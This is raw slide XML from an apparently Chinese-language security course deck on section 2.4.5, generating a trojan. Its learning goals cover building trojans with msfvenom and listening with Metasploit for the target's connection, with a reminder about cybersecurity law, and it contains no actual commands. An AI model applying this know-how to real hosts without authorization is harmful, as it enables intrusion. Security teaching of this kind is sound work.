                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="9716135" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.掌握使用msfvenom模块生成木马的原理和方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.掌握在目标机上执行木马时，在本地利用Metasploit工具监听的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1551305" y="1825625"/>
            <a:ext cx="8547735" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>使用msfvenom模块能够生成木马，利用Metasploit工具能够对目标主机进行监听。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="5959255" y="1280795"/>
            <a:ext cx="4070985" cy="2908300"/>
            <a:chOff x="6387147" y="1859239"/>
            <a:chExt cx="4455396" cy="2908300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="1962744"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6943116" y="1859239"/>
              <a:ext cx="3899427" cy="2908300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>使用msfvenom模块生成木马，利用Metasploit工具监听，注意网络安全的相关法律法规。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
